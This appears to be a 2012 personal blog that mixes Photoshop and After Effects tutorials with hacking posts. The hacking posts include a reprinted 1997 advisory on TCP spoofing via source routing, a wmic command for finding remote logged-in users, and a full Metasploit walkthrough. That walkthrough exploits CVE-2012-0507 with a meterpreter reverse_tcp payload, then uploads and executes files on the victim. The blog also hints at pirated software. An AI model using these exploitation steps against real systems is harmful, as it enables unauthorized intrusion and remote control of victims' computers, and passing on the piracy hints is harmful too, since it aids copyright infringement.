Friday, 12 October 2012

Adobe After Effect Dragon Balls Kamehameha


You want make like this?
Right check ti out.

Kamehameha Tutorial
  •  Make a new composition (composition-new composition or CTRL+N). with width 1000 and   height  700, pixel aspect ratio like in this image below, and for duration 0:00:15:00 and OK
  • and then make a new Solid (Layer-New-Solid) give the name Aura and click make Comp size and OK
  • after that, in that solid layer give a Particle System Effect (effect-simulations-particle world)
  • in the effect options chance the size of the particle world and change Grid from Floor to off, next change birth rate to 1.0, in the phisyc tabs change the animation explosive to Fire, in the Particle tabs change the Particle tipe to faded sphere.
Now, what see?? see that aura??
For more effect you Download Video tutorial Here

Try More Time, you will be the Pro!!
Particle
Composition
Solid 

Thursday, 11 October 2012

Photoshop Tutorial Strip Photoes

Photoshop Turial Today
 Adobe Photoshop tutorial image

Step 1: Crop The Image Into A Square

The first thing we need to do for this effect is crop the image into a square, although technically you could leave the image as a 4x6 or whatever size it happens to be, but the effect tends to look best as a square, so let's crop it. We'll use Photoshop's Crop Tool for this, so select it from the Tools palette:
Adobe Photoshop tutorial image
Select the Crop Tool.
You could also press the letter C to quickly select it with the keyboard shortcut. Then, with the Crop Tool selected, hold down your Shift key and drag a selection around the person's face. Holding Shift tells Photoshop to constrain the selection to a perfect square:
Adobe Photoshop tutorial image
Hold down "Shift" and drag a square selection around the person's face.
Press Enter (Win) / Return (Mac) when you're done dragging out the selection, and Photoshop goes ahead and crops the image into a square:
Adobe Photoshop tutorial image
The image is now cropped into a square.

Step 2: Duplicate The Background Layer Twice

The next thing we're going to do is create a couple of copies of our image. If we look in the Layers palette, we can see that we currently have one layer which is named Background and it contains our original image (or at least, what's left of our original image now that we've cropped it). We need to duplicate the Background layer a couple of times, so use the keyboard shortcut Ctrl+J (Win) / Command+J (Mac) to duplicate it once and then use the same keyboard shortcut again to create a second copy. You should see three layers now in your Layers palette. Double-click directly on the name of the layer on top and rename it "Vertical Strips", then double-click directly on the name of the layer below it and rename it "Horizontal Strips":
Adobe Photoshop tutorial image
Press "Ctrl+J" (Win) / "Command+J" (Mac) to create two copies of the Background layer, then rename the top one "Vertical strips" and the bottom one "Horizontal strips".

Step 3: Fill The Background Layer With Black

Press D on your keyboard to reset Photoshop's Foreground and Background colors to their defaults of black as the Foreground color and white as the Background color (yours may already be set the default colors). Then click on the original Background layer (the bottom layer) in the Layers palette to select it. We're going to fill it with black, and with black now as our Foreground color, we can use the keyboard shortcut Alt+Backspace (Win) / Option+Delete (Mac) which fills the currently selected layer with the current Foreground color (black). Nothing will seem to have happened to the image, since the two layers above the Background layer are blocking it from view, but if we look in the Layers palette, we can see that the Background layer's thumbnail is now filled with black, telling us that the layer itself is filled with black:
Adobe Photoshop tutorial image
Select the Background layer in the Layers palette and press "Alt+Backspace" (Win) / "Option+Delete" (Mac) to fill it with black.

Step 4: Turn The Top Layer Off For Now

We're going to create our horizontal strips first, but the "Vertical Strips" layer on top is going to block our view so we need to temporarily turn it off. To do that, click on the layer visibility icon (the "eyeball" icon) to the left of the "Vertical Strips" layer in the Layers palette. You won't see anything happen to the image itself since the "Vertical Strips" and "Horizontal Strips" layers are identical at the moment, but when you click the eyeball icon, the eyeball will disappear, letting you know that the layer is now hidden:
Adobe Photoshop tutorial image
Click on the "eyeball" icon to the left of the "Vertical Strips" layer in the Layers palette to temporarily turn the layer off.

Step 5: Turn On Photoshop's Grid

We're going to create our vertical and horizontal strips, and to help us out, we'll use Photoshop's grid. Go up to the View menu at the top of the screen, choose Show, and then choose Grid. You can also use the keyboard shortcut Ctrl+' (Win) / Command+' (Mac) to easily turn the grid on and off. When your grid appears, if you find that you can't see it very well because the grid color is blending in with the colors of your image, press Ctrl+K (Win) / Command+K (Mac) to quickly bring up Photoshop's Preferences. Then, from the drop-down menu at the top, choose Guides, Grid and Slices. From here, we can change the color of the grid. In the Grid options, click on the color swatch in the top right corner, which will bring up Photoshop's Color Picker. Select a color for your grid that you'll be able to see in front of your image and then click OK to exit out of the Color Picker. You can see in the screenshot below of the Grid options that I've changed my grid color to yellow:
Adobe Photoshop tutorial image
Change the color of the grid in Photoshop's Preferences if needed.
Click OK to exit out of the Preferences dialog box. You should now see your grid in your new color (in my case yellow) over top of your image:
Adobe Photoshop tutorial image
The grid showing over top of the image.

Step 6: Drag Out A Series Of Horizontal Selections

Let's create our horizontal strips first. Grab your Rectangular Marquee Tool from the Tools palette, or press M on your keyboard to quickly select it:
Adobe Photoshop tutorial image
Select the Rectangular Marquee Tool.
Now let's use our grid to help us create our horizontal strips. First, make sure the "Horizontal Strips" layer is selected in the Layers palette (the currently selected layer is highlighted in blue). I'm going to create horizontal strips that are two grid rows high, with one grid row separating them from each other. Now, I want to make sure that the woman's eyes are included in the final effect, so I'm going to start by dragging out a selection around the two grid rows in front of her eyes. By default, my selection will snap to the grid as I'm dragging to make things easy. If you find that your selection is not snapping to the grid, go up to the View menu at the top of the screen, choose Snap To, and then choose Grid. You should see a checkmark to the left of the word "Grid".
Here's my selection around the two grid rows in front of her eyes:
Adobe Photoshop tutorial image
Drag out a horizontal selection two grid rows high.
This selection will become one of our horizontal strips. Now let's create the rest of them. Hold down your Shift key, which will tell Photoshop to add these next selections to our original selection, and drag out more horizontal selections, keeping each one two grid rows high and leaving one grid row separating each selection. Your image should look like this when you're done:
Adobe Photoshop tutorial image
Hold down "Shift" and drag out the rest of the horizontal selections, making each one two grid rows high and leaving one grid row between them.

Step 7: Add A Layer Mask

With our horizontal selections in place, click on the Layer Mask icon at the bottom of the Layers palette to add a layer mask to the "Horizontal Strips" layer:
Adobe Photoshop tutorial image
Click on the "Layer Mask" icon at the bottom of the Layers palette.
Photoshop adds a mask to the layer and uses the selections we've created to determine which parts of the layer will remain visible and which parts will become hidden from view. The areas that were inside our horizontal selections remain visible, while the areas that were in the grid columns that separated our selections disappear, revealing the black-filled layer underneath:
Adobe Photoshop tutorial image
After adding the layer mask, Photoshop hides the areas between our selections, revealing the black-filled layer underneath.
I'm going to press Ctrl+'(Win) / Command+' (Mac) to temporarily hide my grid so we can see more clearly what's happened. We've now created our horizontal strips:
Adobe Photoshop tutorial image
The horizontal strips are now created.

Step 8: Turn The "Vertical Strips" Layer Back On

We're going to do the same thing now to create our vertical strips. First, click on the top "Vertical Strips" layer in the Layers palette to select it, then click back on its layer visibility icon to bring back the eyeball and turn the layer itself back on:
Adobe Photoshop tutorial image
Select the "Vertical Strips" layer in the Layers palette and click once again on its layer visibility icon to turn the layer back on.

Step 9: Drag Out A Series Of Vertical Selections

Just as we did when creating the horizontal strips, let's drag out a series of selections, this time vertical ones. We'll make the vertical selections two grid columns wide, leaving one grid column between them. Use your Rectangular Marquee Tool to drag out your first selection, then hold down Shift and drag out the rest of your selections. Your image should now look like this:
Adobe Photoshop tutorial image
Drag out a series of vertical selections. Make them two grid columns wide and leave one grid column between each selection to separate them.

Step 10: Add A Layer Mask

With our vertical selections in place, click on the Layer Mask icon at the bottom of the Layers palette:
Adobe Photoshop tutorial image
Add a layer mask to the "Vertical Strips" layer.
Photoshop adds a layer mask to the layer and just as before, it uses our selections to determine which areas of the layer remain visible and which ones disappear from view. The areas inside our selections remain visible, and the areas that were inside the grid columns separating our selections disappear revealing both the "Horizontal Strips" layer and the black-filled layer below:
Adobe Photoshop tutorial image
Only the areas that were inside our vertical selections remain visible.
Once again I'll turn off my grid temporarily with Ctrl+' (Win) / Command+' (Mac) so we can see the image itself more easily. Your image should now look something like this:
Adobe Photoshop tutorial image
The vertical and horizontal strips are now created.

Step 11: Select All The Strip Intersection Points

We have our vertical and horizontal strips, but all it really looks like at the moment is that we have a bunch of black squares covering our image. We need to create the illusion that the strips are weaving above and below each other. To do that, we need to select the areas where the vertical and horizontal strips intersect. Before we do that though, press Ctrl+' (Win) / Command+' (Mac) to turn off the grid if you haven't already, since we no longer need it. Then, hold down your Ctrl (Win) / Command (Mac) key and click directly on the "Horizontal Strips" layer's layer mask thumbnail:
Adobe Photoshop tutorial image
Hold down "Ctrl" (Win) / "Command" (Mac) and click directly on the "Horizontal Strips" layer mask thumbnail.
This will load the horizontal selections back into the image:
Adobe Photoshop tutorial image
The horizontal selections are now loaded once again in the image.
Then hold down Shift+Ctrl+Alt (Win) / Shift+Command+Option (Mac) and click directly on the "Vertical Strips" layer mask thumbnail:
Adobe Photoshop tutorial image
Hold down "Shift+Ctrl+Alt" (Win) / "Shift+Command+Option" (Mac) and click directly on the "Vertical Strips" layer mask.
This will do two things: One, it will load the vertical selections back in to the image, and two, it will tell Photoshop to keep the selection around only the areas where the horizontal and vertical selections intersect. Everything else becomes deselected:
Adobe Photoshop tutorial image
Only the areas where the horizontal and vertical selections intersect remain selected.

Step 12: Save The Selection

Before we go any further, we need to save this selection. To do that, go up to the Select menu at the top of the screen and choose Save Selection. When the "Save Selection" dialog box appears, simply click OK in the top right corner to exit out of it:
Adobe Photoshop tutorial image
Save the selection.

Step 13: Deselect Every Other Square Selection

With your Rectangular Marquee Tool still active, hold down your Alt (Win) / Option (Mac) key and drag a selection around every other square selection. This will deselect the selections you drag around. Continue dragging around every other square selection to deselect it until only half of the original square selections remain. Your image should look like this:
Adobe Photoshop tutorial image
Deselect every other square selection until only half of them remain.

Step 14: Copy The Selection To A New Layer

Click on the "Horizontal Strips" layer thumbnail in the Layers palette to select it. Then press Ctrl+J (Win) / Command+J (Mac) to copy the selected areas to a new layer. You won't see anything happen to the image itself, but if you look in the Layers palette, you'll see a new layer named "Layer 1" added between the "Horizontal Strips" and "Vertical Strips" layers which contains our square selected areas:
Adobe Photoshop tutorial image
Press "Ctrl+J" (Win) / "Command+J" (Mac) to copy the selected areas to a new layer.

Step 15: Create A Clipping Mask

With the new layer selected, go up to the Layer menu at the top of the screen and choose Create Clipping Mask. You can also use the keyboard shortcut Ctrl+Alt+G (Win) / Command+Option+G (Mac). Either way "clips" the new layer to the layer below it. We can't see any difference in the image itself, but in the Layers palette, we can see that the new layer is now indented to the right which tells us that it's being clipped by the layer below it:
Adobe Photoshop tutorial image
Hold "Ctrl" (Win) / "Command" (Mac) and click on the "Horizontal Strips" layer's layer mask thumbnail.

Step 16: Reload The Saved Selection

Let's bring back the selection we saved a moment ago, and we can do that easily using the keyboard shortcut Ctrl+Alt+4 (Win) / Command+Option+4 (Mac):
Adobe Photoshop tutorial image
Reload the saved selection.

Step 17: Deselect The Opposite Square Selections

With the Rectangular Marquee Tool still selected, once again hold down your Alt (Win) / Option (Mac) key and drag around every other square selection to deselect it. This time though, you want to keep the square selections you deleted the first time we did this and deselect all the ones you kept, so that when you're done, your image looks like this:
Adobe Photoshop tutorial image
Hold down "Alt" (Win) / "Option" (Mac) and drag selections around the square selections to deselect them. Keep the ones you deselected previously and deselect the ones you kept.

Step 18: Copy The Selection To A New Layer

Click on the "Vertical Strips" layer at the top of the Layers palette to select it, then press Ctrl+J (Win) / Command+J (Mac) to copy the selected areas to a new layer. Again, we won't see anything happen to the image itself, but the Layers palette shows us a new layer named "Layer 2" above the "Vertical Strips" layer which contains our selected square areas:
Adobe Photoshop tutorial image
The Layers palette showing the new layer at the top containing our selected square areas.

Step 19: Create A Clipping Mask

Just as we did a moment ago, either go up to the Layer menu and choose Create Clipping Mask or press Ctrl+Alt+G (Win) / Command+Option+G (Mac) to create a clipping mask. We can now see the new layer indented to the right telling us that it is being clipped by the "Vertical Strips" layer below it:
Adobe Photoshop tutorial image
The new layer is now being clipped by the "Vertical Strips" layer below it.

Step 20: Add An Outer Glow Layer Style

With the top layer still selected, click on the Layer Styles icon at the bottom of the Layers palette:
Adobe Photoshop tutorial image
Click on the "Layer Styles" icon.
Select Outer Glow from the list of Layer Styles that appears:
Adobe Photoshop tutorial image
Select the "Outer Glow" layer style.
This brings up the "Layer Style" dialog box set to the "Outer Glow" options in the middle. We're going to turn our "glow" into a shadow, and to do that, we need to change the Blend Mode at the top from Multiply. We also don't want yellow as our shadow color, so click on the color swatch just below the word "Noise", which brings up Photoshop's Color Picker, and select black as the color. Click OK once you've selected black to exit out of the Color Picker. Lower the Opacity value to about 60% so the shadow isn't quite as dark and intense. Finally, in the "Elements" section in the middle of the dialog box, raise the Size value to around 40 pixels:
Adobe Photoshop tutorial image
Change the "Outer Glow" options circled in red above.
You may need to adjust the "Size" value depending on the size and resolution of the image you're using. Click OK when you're done to exit out of the Layer Style dialog box. Your image should now look something like this. We're almost done:
Adobe Photoshop tutorial image
The image after applying the layer style to "Layer 2".

Step 21: Copy And Paste The Layer Style Onto "Layer 1"

All that's left to do now is apply the exact same Outer Glow layer style to "Layer 1". Rather than adding another Outer Glow and having to change all the settings in the options again, we can simply copy our layer style from "Layer 2" and paste it onto "Layer 1". To do that, go up to the Layer menu at the top of the screen, choose Layer Style, and then choose Copy Layer Style. Then click on "Layer 1" in the Layers palette to select it, go back up to the Layer menu, choose Layer Style once again, and this time, choose Paste Layer Style.
As soon as you do that, the Outer Glow, along with all the settings we just changed, is pasted onto "Layer 1", and the "interweaving photo strips" effect is complete:
Adobe Photoshop tutorial image
Copy and paste the Outer Glow layer style from "Layer 2" onto "Layer 1" to complete the effect.
And there we have it!

Wednesday, 10 October 2012

Adobe After Effect Free Tutorial

       Adobe After Effect Is one of Adobe product, Adobe After Effect is use to create many animation 3D video, is a nice tool one. May be one of you have a After Effect software but you don't how to use it. Now, I will give a little tips n trick.

       Firstly, you must get some effect plugin (trapcode effect), and I will give you the download link later. rigth, now you must have a After Effect Software, if you don't you can download from Adobe site or you can download from a..... (you know what I mean right??...heee). and this the best tutorial, you can download that tutorial for free and also download the footer and presets.




Download Adobe After Effect : Adobe After Effect Cs Free Download

Download Trapcode Effect from Mediafire, it's free.

This a short tutorial from filmmakeriq.com "create your own -Private Ryab-"
You don’t have to be Steven Spielberg, you don’t need millions of dollars, you don’t even need more than one actor to make your own war movie (well, one shot anyway).
In this two day tutorial series, Michal will show you how to create a realistic war movie shot using only one actor and a camera man.
Day 1 will show you: Color correction, realistic camera shake, and bullets hitting the ground on fast footage.
These are just pointers to lead you on your track to making convincing war movie visual effects.
3… 2… 1… FIRE!

Download Here

for next tutorial I will give tutorial from my own After Effect creation.
see you guys.


Tuesday, 9 October 2012

###leave Hacking Tutorial

I won't write about a hacking tutorial again, but if you need it, you can request by contact me...
ok.. :)



we are start to fokus for Design World, like PhotoShop Cs, Priemere Pro, After Effect, Sketchup,
3D, and all about designer...

I will Start to write tomorrow, :) now go to sleep

nice dream all .

Simple TCP Spoofing Attack

This another how to for you guy's

SPOOFING Attack
                     
Over the past few years TCP sequence number prediction attacks have become a
real threat against unprotected networks, taking advantage of the inherent
trust relationships present in many network installations.  TCP sequence
number prediction attacks have most commonly been implemented by opening a
series of connections to the target host, and attempting to predict the
sequence number which will be used next.  Many operating systems have
therefore attempted to solve this problem by implementing a method of
generating sequence numbers in unpredictable fashions.  This method does
not solve the problem.

This advisory introduces an alternative method of obtaining the initial
sequence number from some common trusted services.  The attack presented here
does not require the attacker to open multiple connections, or flood a port
on the trusted host to complete the attack.  The only requirement is that
source routed packets can be injected into the target network with fake
source addresses.

This advisory assumes that the reader already has an understanding of how
TCP sequence number prediction attacks are implemented.

The impact of this advisory is greatly diminished due to the large number of
organizations which block source routed packets and packets with addresses
inside of their networks.  Therefore we present the information as more of
a 'heads up' message for the technically inclined, and to re-iterate that
the randomization of TCP sequence numbers is not an effective solution
against this attack.


Technical Details
~~~~~~~~~~~~~~~~~

The problem occurs when particular network daemons accept connections
with source routing enabled, and proceed to disable any source routing
options on the connection.  The connection is allowed to continue, however
the reverse route is no longer used.  An example attack can launched against
the in.rshd daemon, which on most systems will retrieve the socket options
via getsockopt() and then turn off any dangerous options via setsockopt().

An example attack follows.

Host A is the trusted host
Host B is the target host
Host C is the attacker

Host C initiates a source routed connection to in.rshd on host B, pretending
to be host A.

Host C spoofing Host A         <SYN>    -->  Host B in.rshd

Host B receives the initial SYN packet, creates a new PCB (protocol
control block) and associates the route with the PCB.  Host B responds,
using the reverse route, sending back a SYN/ACK with the sequence number.

Host C spoofing Host A  <--  <SYN/ACK>       Host B in.rshd

Host C responds, still spoofing host A, acknowledging the sequence number.
Source routing options are not required on this packet.

Host C spoofing Host A         <ACK>    -->  Host B in.rshd

We now have an established connection, the accept() call completes, and
control is now passed to the in.rshd daemon.  The daemon now does IP
options checking and determines that we have initiated a source routed
connection.  The daemon now turns off this option, and any packets sent
thereafter will be sent to the real host A, no longer using the reverse
route which we have specified.  Normally this would be safe, however the
attacking host now knows what the next sequence number will be.  Knowing
this sequence number, we can now send a spoofed packet without the source
routing options enabled, pretending to originate from Host A, and our
command will be executed.

In some conditions the flooding of a port on the real host A is required
if larger ammounts of data are sent, to prevent the real host A from
responding with an RST.  This is not required in most cases when performing
this attack against in.rshd due to the small ammount of data transmitted.

It should be noted that the sequence number is obtained before accept()
has returned and that this cannot be prevented without turning off source
routing in the kernel.

As a side note, we're very lucky that TCP only associates a source route with
a PCB when the initial SYN is received.  If it accepted and changed the ip
options at any point during a connection, more exotic attacks may be possible.
These could include hijacking connections across the internet without playing
a man in the middle attack and being able to bypass IP options checking
imposed by daemons using getsockopt().  Luckily *BSD based TCP/IP stacks will
not do this, however it would be interesting to examine other implementations.

Impact
~~~~~~

The impact of this attack is similar to the more complex TCP sequence
number prediction attack, yet it involves fewer steps, and does not require
us to 'guess' the sequence number.  This allows an attacker to execute
arbitrary commands as root, depending on the configuration of the target
system.  It is required that trust is present here, as an example, the use
of .rhosts or hosts.equiv files.


Solutions
~~~~~~~~~

The ideal solution to this problem is to have any services which rely on
IP based authentication drop the connection completely when initially
detecting that source routed options are present.  Network administrators
and users can take precautions to prevent users outside of their network
from taking advantage of this problem.  The solutions are hopefully already
either implemented or being implemented.

1. Block any source routed connections into your networks
2. Block any packets with internal based address from entering your network.

Network administrators should be aware that these attacks can easily be
launched from behind filtering routers and firewalls.  Internet service
providers and corporations should ensure that internal users cannot launch
the described attacks.  The precautions suggested above should be implemented
to protect internal networks.

Example code to correctly process source routed packets is presented here
as an example.  Please let us know if there are any problems with it.
This code has been tested on BSD based operating systems.

        u_char optbuf[BUFSIZ/3];
        int optsize = sizeof(optbuf), ipproto, i;
        struct protoent *ip;

        if ((ip = getprotobyname("ip")) != NULL)
                ipproto = ip->p_proto;
        else
                ipproto = IPPROTO_IP;
        if (!getsockopt(0, ipproto, IP_OPTIONS, (char *)optbuf, &optsize) &&
            optsize != 0) {
                for (i = 0; i < optsize; ) {
                        u_char c = optbuf[i];
                        if (c == IPOPT_LSRR || c == IPOPT_SSRR)
                                exit(1);
                        if (c == IPOPT_EOL)
                                break;
                        i += (c == IPOPT_NOP) ? 1 : optbuf[i+1];
                }
        }


One critical concern is in the case where TCP wrappers are being used.  If
a user is relying on TCP wrappers, the above fix should be incorporated into
fix_options.c.  The problem being that TCP wrappers itself does not close
the connection, however removes the options via setsockopt().  In this case
when control is passed to in.rshd, it will never see any options present,
and the connection will remain open (even if in.rshd has the above patch
incorporated).  An option to completely drop source routed connections will
hopefully be provided in the next release of TCP wrappers.  The other option
is to undefine KILL_IP_OPTIONS, which appears to be undefined by default.
This passes through IP options and allows the called daemon to handle them
accordingly.


Disabling Source Routing
~~~~~~~~~~~~~~~~~~~~~~~~

We believe the following information to be accurate, however it is not
guaranteed.

--- Cisco

To have the router discard any datagram containing an IP source route option
issue the following command:

no ip source-route

This is a global configuration option.


--- NetBSD

Versions of NetBSD prior to 1.2 did not provide the capability for disabling
source routing.  Other versions ship with source routing ENABLED by default.
We do not know of a way to prevent NetBSD from accepting source routed packets.
NetBSD systems, however, can be configured to prevent the forwarding of packets
when acting as a gateway.

To determine whether forwarding of source routed packets is enabled,
issue the following command:

# sysctl net.inet.ip.forwarding
# sysctl net.inet.ip.forwsrcrt

The response will be either 0 or 1, 0 meaning off, and 1 meaning it is on.

Forwarding of source routed packets can be turned off via:

# sysctl -w net.inet.ip.forwsrcrt=0

Forwarding of all packets in general can turned off via:

# sysctl -w net.inet.ip.forwarding=0


--- BSD/OS

BSDI has made a patch availible for rshd, rlogind, tcpd and nfsd.  This
patch is availible at:

ftp://ftp.bsdi.com/bsdi/patches/patches-2.1

OR via their patches email server <patches@bsdi.com>

The patch number is
U210-037 (normal version)
D210-037 (domestic version for sites running kerberized version)


BSD/OS 2.1 has source routing disabled by default

Previous versions ship with source routing ENABLED by default.  As far as
we know, BSD/OS cannot be configured to drop source routed packets destined
for itself, however can be configured to prevent the forwarding of such
packets when acting as a gateway.

To determine whether forwarding of source routed packets is enabled,
issue the following command:

# sysctl net.inet.ip.forwarding
# sysctl net.inet.ip.forwsrcrt

The response will be either 0 or 1, 0 meaning off, and 1 meaning it is on.

Forwarding of source routed packets can be turned off via:

# sysctl -w net.inet.ip.forwsrcrt=0

Forwarding of all packets in general can turned off via:

# sysctl -w net.inet.ip.forwarding=0


--- OpenBSD

Ships with source routing turned off by default.  To determine whether source
routing is enabled, the following command can be issued:

# sysctl net.inet.ip.sourceroute

The response will be either 0 or 1, 0 meaning that source routing is off,
and 1 meaning it is on.  If source routing has been turned on, turn off via:

# sysctl -w net.inet.ip.sourceroute=0

This will prevent OpenBSD from forwarding and accepting any source routed
packets.


--- FreeBSD

Ships with source routing turned off by default.  To determine whether source
routing is enabled, the following command can be issued:

# sysctl net.inet.ip.sourceroute

The response will be either 0 or 1, 0 meaning that source routing is off,
and 1 meaning it is on.  If source routing has been turned on, turn off via:

# sysctl -w net.inet.ip.sourceroute=0


--- Linux

Linux by default has source routing disabled in the kernel.


--- Solaris 2.x

Ships with source routing enabled by default.  Solaris 2.5.1 is one of the
few commercial operating systems that does have unpredictable sequence
numbers, which does not help in this attack.

We know of no method to prevent Solaris from accepting source routed
connections, however, Solaris systems acting as gateways can be prevented
from forwarding any source routed packets via the following commands:

# ndd -set /dev/ip ip_forward_src_routed 0

You can prevent forwarding of all packets via:

# ndd -set /dev/ip ip_forwarding 0

These commands can be added to /etc/rc2.d/S69inet to take effect at bootup.


--- SunOS 4.x

We know of no method to prevent SunOS from accepting source routed
connections, however a patch is availible to prevent SunOS systems from
forwarding source routed packets.

This patch is availible at:

ftp://ftp.secnet.com/pub/patches/source-routing-patch.tar.gz

To configure SunOS to prevent forwarding of all packets, the following
command can be issued:

# echo "ip_forwarding/w 0" | adb -k -w /vmunix /dev/mem
# echo "ip_forwarding?w 0" | adb -k -w /vmunix /dev/mem

The first command turns off packet forwarding in /dev/mem, the second in
/vmunix.


--- HP-UX

HP-UX does not appear to have options for configuring an HP-UX system to
prevent accepting or forwarding of source routed packets.  HP-UX has IP
forwarding turned on by default and should be turned off if acting as a
firewall.  To determine whether IP forwarding is currently on, the following
command can be issued:

# adb /hp-ux
ipforwarding?X      <- user input
ipforwarding:
ipforwarding: 1
#

A response of 1 indicates IP forwarding is ON, 0 indicates off.  HP-UX can
be configured to prevent the forwarding of any packets via the following
commands:

# adb -w /hp-ux /dev/kmem
ipforwarding/W 0
ipforwarding?W 0
^D
#

--- AIX

AIX cannot be configured to discard source routed packets destined for itself,
however can be configured to prevent the forwarding of source routed packets.
IP forwarding and forwarding of source routed packets specifically can be
turned off under AIX via the following commands:

To turn off forwarding of all packets:

# /usr/sbin/no -o ipforwarding=0

To turn off forwarding of source routed packets:

# /usr/sbin/no -o nonlocsrcroute=0

Note that these commands should be added to /etc/rc.net



If shutting off source routing is not possible and you are still using
services which rely on IP address authentication, they should be disabled
immediately (in.rshd, in.rlogind).  in.rlogind is safe if .rhosts and
/etc/hosts.equiv are not used.


Copyright Notice
~~~~~~~~~~~~~~~~
The contents of this advisory are Copyright (C) 1997 Secure Networks Inc,
and may be distributed freely provided that no fee is charged for
distribution, and that proper credit is given.

 You can find Secure Networks papers at ftp://ftp.secnet.com/pub/papers
 and advisories at ftp://ftp.secnet.com/advisories

 You can browse our web site at http://www.secnet.com

 You can subscribe to our security advisory mailing list by sending mail to
 majordomo@secnet.com with the line "subscribe sni-advisories"

Monday, 8 October 2012

Never Give Up

Hy all, until now I'm still waiting for aproval.

but my eyes need to rest, see you tomorrow with more tutorial...

skimlinks.com
 see guys

How To Get User Name and Password (Remote Pc With IP))

     After you get the IP addresses of some computers on my network. You can use command line tool like PsExec, PsLogged which can take the IP Address as input and find out the username of the currently logged in user. Here that one of that tool, PsLoggedOn.

     You can determine who is using resources on your local computer with the "net" command ("net session"), however, there is no built-in way to determine who is using the resources of a remote computer. In addition, NT comes with no tools to see who is logged onto a computer, either locally or remotely. PsLoggedOn is an applet that displays both the locally logged on users and users logged on via resources for either the local computer, or a remote one. If you specify a user name instead of a computer, PsLoggedOn searches the computers in the network neighborhood and tells you if the user is currently logged on.
     PsLoggedOn's definition of a locally logged on user is one that has their profile loaded into the Registry, so PsLoggedOn determines who is logged on by scanning the keys under the HKEY_USERS key. For each key that has a name that is a user SID (security Identifier), PsLoggedOn looks up the corresponding user name and displays it. To determine who is logged onto a computer via resource shares, PsLoggedOn uses the NetSessionEnum API. Note that PsLoggedOn will show you as logged on via resource share to remote computers that you query because a logon is required for PsLoggedOn to access the Registry of a remote system.

You can use command below

wmic.exe /node:IP-or-HostName ComputerSystem Get UserName
 
Example 
 
wmic.exe /node:172.28.1.100 ComputerSystem Get UserName 

Ouput :
UserName
DOMAIN\User
 
Download PsLoggedOn
 

How To Remote Computer Using Metasploit

Whenever someone say PenTesting tool, the first thing come in our mind is MetaSploit . Today, i am going to demonstrate how to use the Metasploit tool to exploit the popular java AtomicReferenceArray Type Violation vulnerability(CVE-2012-0507).

    About MetaSploit:
    Metsploit is a very Powerful PenTesting Tool . Metasploit Framework, a tool for developing and executing exploit code against a remote target machine. The Metasploit Project is also well known for anti-forensic and evasion tools, some of which are built into the Metasploit Framework. Very useful tool for Information Gathering, Vulnerability Scanning, Exploit Development, Client side exploits,...

Mastering the Framework: A free course from Offensive-Security
The Offensive Security Team along with several active community members, made a free course on the Metasploit Framework "Mastering the Framework". The course covers Information gathering, Social engineering attacks, exploit development, Advance AV avoidance and etc...

The course is available here:
www.offensive-security.com/metasploit-unleashed/Introduction

    Donate to HFC, Feed a Child!
    The "Mastering the Framework" is free course. If you enjoyed the course, please donate to Hackers for Charity(HFC). Beyond merely providing food for children in need in East Africa, the Hackers for Charity Food Program enables children and their families to provide for themselves and become more self-sufficient by teaching them valuable agricultural skills. Every cent received is directly sent Hackers for Charity in support of their mission. Any amount, no matter how small, makes a difference; it only takes $9.00 to feed a child for a month.

    You can find further details about the donation here:
    http://www.offensive-security.com/metasploit-unleashed/Donate


Hey, where are you going?! Wait a Sec, take that course Once i demonstrate how to use the metasploit. Because, It will be hard to understand or boring, if you read those things directly.

Requirements:

    VirtualBox
    Target OS(windows,...)
    PenTesting Distro(Backtrack )
    JRE 6(unpatched version)


CVE-2012-0507 is a vulnerability in the JRE due to the fact that The AtomicReferenceArray class implementation did not properly check if the array is of an expected Object[] type. A malicious Java application or applet could use this flaw to cause Java Virtual Machine(JVM) to crash or bypass Java sandbox restrictions.

    Security News: This vulnerability affects Windows, Mac and Linux operating systems. Last month, Flashback malware infect more than 600,000 Mac computers by exploiting this vulnerability. Recently, The INSS , The Amnesty International UK websites injected with malicious code that exploit the CVE-2012-0507.

I am going to demonstrate this vulnerability with VirtualBox.  I have setup two Virtual Machines namely "Target" and "BT5". I have installed XP 2 in the Target and Backtrack 5 R2 in the 'BT5'.

(need help in configuring the VM?, read this: setup PenTesting Lab).

Part I: Preparing the Target Machine:
Start the "Target" Machine.
Install the JRE 6.

Part II: Preparing the PenTesting Machine:
Now, start the BT5.

Open the Terminal and Type "msfupdate".  This will update the Metasploit Framework(MSF) with the latest exploits and Payloads. As CVE-2012-0507 is latest vulnerability, you have to update the MSF before proceeding further.

    slow Internet Connection?! If you have slow internet connection, then you can download the java_atomicreferencearray module alone instead of updating all modules.
    Download the java_atomicreferencearray.rb and paste in this folder "/opt/metasploit/msf3/modules/exploits/multi/browser/"

    Then, Download CVE-2012-0507.jar and paste in this folder "/opt/metasploit/msf3/data/exploits/"


Part III :
Exploiting the Java AtomicReferenceArray Type Violation Vulnerability:


Step 1:
Open the Terminal and type "msfconsole".  This will bring the Metasploit console , here you can interact with the MSF.

Step 2:
Type "use exploit/multi/browser/java_atomicreferencearray" . This command will use the java_atomicreferencearray.rb module for the attack.


Now type "show options" to display the which settings are available and/or required for this specific module.



Now type "set SRVPORT 80".
and  "set URIPATH /".



Step 3: Set Payload
Type "show payloads", this will displays the list of payloads.  We are going to use the 'reverse_tcp' payload. This payload will get reverse tcp connection from the Target to PenTesting machine.

Type 'set payload java/meterpreter/reverse_tcp' in the console.


set LHOST [IP_address] :  In order to get reverse connection, we have to set our IP in the LHOST.

open the Terminal and type "ifconfig". This will display the IP info of our PenTesting Machine.  The IP will be "192.168.56.x".   For instance, let me say the ip is 192.168.56.10.

Now  Type in the msfconsole as "set LHOST 192.168.56.10".



Part IV: Breaching the Target Machine:

So , are you ready?! Let us break into the Target Machine.

Step 1:

Type "exploit" in the msfconsole. This will start the reverse handler to our Machine and it will wait anyone that will connect to the our HTTP server (Eg: http://192.168.56.10). Once victim connect to our server, it will send a jar will that will exploit the CVE-2012-0507 vulnerability.

step 2:

Open the Firefox/IE in the Target machine.
Enter "http://192.168.56.10".
It loads nothing but exploit will run in the background.
Step 3:
Open the BT5 machine, it will display the following output:


Now type "sessions", this will show the list of active sessions .

Type "sessions -i 1", this will open the connection to the session with the id '1' and bring you to Meterpreter. Meterpreter will help you to interact/control with the Target.



Step 4:Upload files
Yeeeh..! we got backdoor to the Target machine, now we can run any commands in the Target.



For Example, Typing 'sysinfo' will display the system information.


You can also upload and execute your own executable files in the Target machine.

'upload /Test.exe c:\\", this command will upload the Test.exe from the root('file system' dir) folder of the BT5 to the C drive of the Target.

'execute -f C:\\Test.exe", this command will run our uploaded File in the Target.


Security Tips:
